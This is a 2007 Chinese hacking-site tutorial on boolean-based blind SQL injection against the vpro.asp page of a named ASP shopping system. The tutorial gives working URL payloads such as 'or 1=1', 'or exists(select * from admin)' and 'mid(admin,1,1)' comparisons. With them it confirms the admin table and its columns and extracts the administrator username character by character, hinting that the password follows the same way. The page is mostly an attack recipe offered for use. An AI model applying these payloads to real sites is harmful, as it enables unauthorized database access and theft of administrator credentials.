 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 新or注入教程 | |||||
作者:佚名 文章来源:网络 点击数: 更新时间:2007-9-10  |
|||||
|
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典哦,呵呵。 我们来构造测试语句: vpro.asp?id=1 or exists(select * from admin) 返回错误页面,说明存在admin表我们来换一个表试试! vpro.asp?id=1 or exists(select * from n0h4ck) 说明不存在n0h4ck这个表。 我们继续来,构造语句 vpro.asp?id=1 or exists(select admin from admin) 返回or 1=1的页面,说明admin表存在admin字段。 vpro.asp?id=1 or exists(select padd from admin) 返回or 1=2的页面,说明admin表不存在padd字段。 我们现在开始猜测数据了, vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n' 返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是"n"。 我们再来 vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a' 返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是"a",我们第一个会想到什么呢?当然是"admin"啦。 我们用left函数确定一下, vpro.asp?id=1 or (select left(admin,5) from admin)='admin' 猜测正确,的确是admin,好了,后面的话就不用我说了吧! |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
